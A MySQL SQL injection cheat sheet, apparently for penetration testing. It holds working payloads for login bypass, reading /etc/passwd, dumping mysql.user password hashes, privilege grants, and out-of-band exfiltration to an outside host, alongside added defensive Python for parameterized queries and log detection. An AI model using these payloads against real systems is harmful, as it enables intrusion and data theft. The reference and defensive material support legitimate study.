MySQL SQL Injection Cheat Sheet

Initial Exploitation

  • Version: SELECT @@VERSION
  • Version: SELECT version()
  • Current User: SELECT user()
  • Current User: SELECT system_user()
  • Current Database: SELECT database()

Quick Detection

Error Based SQLi

  For integer inputs:

  (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

  For string inputs:

  '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

  The payloads above should throw 'duplicate entry' errors.

Clear SQLi Tests

  These tests are useful for boolean-based SQL injection and for silent attacks.

  • product.php?id=4
  • product.php?id=5-1
  • product.php?id=4 OR 1=1
  • product.php?id=-1 OR 17-7=10

Blind SQL Injection (Time Based)

  Use this when you cannot see any difference in the output. Do not use delays of more than 30 seconds, because the database API connection timeout could easily be reached.

  • SLEEP(25)--
    Just like sleep: waits for the specified time. A CPU-safe way to make the database wait.
  • SELECT BENCHMARK(1000000,MD5('A'));

Real World Samples

  • ProductID=1 OR SLEEP(25)=0 LIMIT 1--
  • ProductID=1) OR SLEEP(25)=0 LIMIT 1--
  • ProductID=1' OR SLEEP(25)=0 LIMIT 1--
  • ProductID=1') OR SLEEP(25)=0 LIMIT 1--
  • ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
  • ProductID=SELECT SLEEP(25)--

Line Comments

  • DROP sampletable;--
  • DROP sampletable;#

  Username: admin'--
  Username: admin' or '1'='1'--

  SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'

  This logs you in as the admin user, because the rest of the SQL query is ignored.
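The login bypass above works only because the username is spliced into the SQL text. The following Python is an added example, not code from the cheat sheet: it builds a small in-memory SQLite table (SQLite is a stand-in for MySQL here; the table and row are constructed) and runs the same `members` lookup twice, once with string formatting and once with a parameterized query, so the effect of the `--` and `' or '1'='1'` inputs on each can be compared. The `?` placeholder is sqlite3's; MySQL drivers such as PyMySQL use `%s`, but the principle is identical.

```python
import sqlite3


def make_db():
    """Constructed sample data: one 'members' row, standing in for the page's table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.execute("INSERT INTO members VALUES ('admin', 'correct-horse')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """VULNERABLE: user input is formatted into the SQL string.

    A quote followed by a comment sequence in the username ends the string
    literal and comments out the password check entirely.
    """
    sql = ("SELECT username FROM members WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(con, username, password):
    """HARDENED: the statement is fixed and the values travel separately.

    Quote and comment characters in the input are compared as data, so the
    same inputs that bypass login_vulnerable() simply fail to match a row.
    """
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Return (vulnerable_result, hardened_result) for one pair of inputs."""
    con = make_db()
    return login_vulnerable(con, username, password), login_parameterized(con, username, password)


if __name__ == "__main__":
    for user in ("admin", "admin'--", "' or '1'='1'--"):
        print(repr(user), "->", compare(user, "wrong"))
```

Note that SQLite treats `--` as a comment with no trailing whitespace required, which is why the raw `admin'--` input is enough in this demo; the parameterized version is unaffected either way, which is the point: the fix is structural, not a matter of filtering particular characters.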

Inline Comments

  Inline comments comment out the rest of the query when left unclosed. They can also be used for bypassing blacklists, removing spaces, obfuscating, and determining database versions.

  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable

If Statements

  Get a response based on an if statement. This is one of the key points of blind SQL injection, and it is also very useful for testing simple things blindly and accurately.

MySQL If Statement

  • IF(condition, true-part, false-part)
  • SELECT IF(1=1, 'true', 'false')

If Statement SQL Injection Attack Samples

  • SELECT IF(user()='root@localhost','true','false')

String without Quotes

  • SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

  This returns 'KLM'.

Bulk Insert

  Insert file content into a table.

  • SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --

Load File

  • ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
  • SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

  The second query shows the content of c:\boot.ini.

Command Execution

  Possible using UDFs (user defined functions): http://packetstormsecurity.org/libraries/lib_mysqludf_sys_0.0.3.tar.gz

Create Users

  • CREATE USER username IDENTIFIED BY password; --

Drop Users

  • DROP USER username; --

Make User DBA

  • GRANT ALL PRIVILEGES ON *.* TO username@'%';

List Users

  • SELECT * FROM 'user' WHERE 1 LIMIT 0,30
  • SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
  • SELECT * FROM mysql.user

List Passwords

  • SELECT user, password FROM mysql.user
  • SELECT user, password FROM mysql.user LIMIT 1,1
  • SELECT password FROM mysql.user WHERE user = 'root'

List Databases

  • SELECT schema_name FROM information_schema.schemata;
  • SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

Privileges

  • SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
  • SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1--

Getting user defined tables

  • SELECT table_name FROM information_schema.tables WHERE table_schema = tblUsers

  tblUsers -> table name

Getting Column Names

  • SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = tblUsers

  tblUsers -> table name

  • SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = username;

  Finds the tables which have a column called 'username'.

Default Databases

  • information_schema (>= mysql 5.0)
  • mysql

Path of DB files

  • SELECT @@datadir
    Example result: C:\AppServ\MySQL\data\

Time Based SQLi Exploitation

  ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--

  {INJECTION} = the query you want to run. If the condition is true, the response arrives after 14 seconds; if it is false, it is delayed for one second.

Out of Band Channel

  ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))

  Makes an NBNS query request / DNS resolution request to yourhost.com.

  ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')

  Writes data to your shared folder/file.

  {INJECTION} = the query you want to run.
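The time-based and out-of-band payloads in the last two sections, like the comment, boolean and LOAD_FILE probes earlier on this page, leave recognisable traces in a web server's access log. The following Python is an added example, not part of the original cheat sheet: it parses a handful of constructed Apache-style log lines (the IPs and timestamps are invented; yourhost.com is the page's own placeholder) and tags each request's query string with the payload families it matches. The indicator regexes are my own triage heuristics, not a vetted ruleset, and they are broad on purpose.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined"-style access log line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Indicator families mirroring the payload groups on this page. The regexes are
# heuristic (assumption: tuned for triage, so expect noise on free-text fields).
INDICATORS = [
    ("time-based",  re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("file-access", re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.|\bmysql\.user\b", re.I)),
    ("ddl",         re.compile(r"\b(?:drop|create\s+user|grant)\b", re.I)),
    ("comment",     re.compile(r"--|#|/\*")),
    ("boolean-or",  re.compile(r"\bor\b\s+\S+\s*=\s*\S+", re.I)),
]

INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Constructed sample log (not real traffic). Line 6 (id=5-1) is the arithmetic
# probe from the "Clear SQLi Tests" section and is deliberately NOT caught.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /product.php?id=4 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /product.php?id=4%20OR%201%3D1 HTTP/1.1" 200 9031
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /product.php?id=1%20OR%20SLEEP(25)%3D0%20LIMIT%201-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:30 +0000] "GET /search.php?q=-99%20OR%20(SELECT%20LOAD_FILE(concat('%5C%5C%5C%5C',version(),'yourhost.com%5C%5C'))) HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2024:10:00:31 +0000] "GET /login.php?user=admin'-- HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:00:32 +0000] "GET /product.php?id=5-1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:33 +0000] "GET /product.php?id=1;DR/**/OP%20sampletable-- HTTP/1.1" 500 0
"""


def classify_query(query):
    """Return the indicator families a decoded query string matches, in INDICATORS order."""
    # Strip /*...*/ so a keyword split by inline comments (DR/**/OP) is seen whole.
    normalized = INLINE_COMMENT_RE.sub("", query)
    hits = []
    for name, rx in INDICATORS:
        # The comment family must look at the raw text, since normalization removes /* */.
        target = query if name == "comment" else normalized
        if rx.search(target):
            hits.append(name)
    return hits


def scan_log(text):
    """Yield (client ip, decoded query string, families) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Percent-decode so encoded spaces, '=' and backslashes are inspected in clear.
        decoded = unquote_plus(m.group("url"))
        query = decoded.partition("?")[2]
        hits = classify_query(query)
        if hits:
            findings.append((m.group("ip"), query, hits))
    return findings


if __name__ == "__main__":
    for ip, query, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:10} {', '.join(hits):30} {query}")
```

Two limits are worth keeping in mind when using something like this. Access logs do not carry POST bodies or response times, so a time-based probe is only confirmed by correlating request timestamps with backend latency, and the `id=5-1` style arithmetic probe is indistinguishable from a benign value by pattern alone; catching it means comparing the responses served for `id=4` and `id=5-1`. Outbound DNS and SMB connections from the database host, as in the out-of-band section, are better caught at the egress firewall than in the web log.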
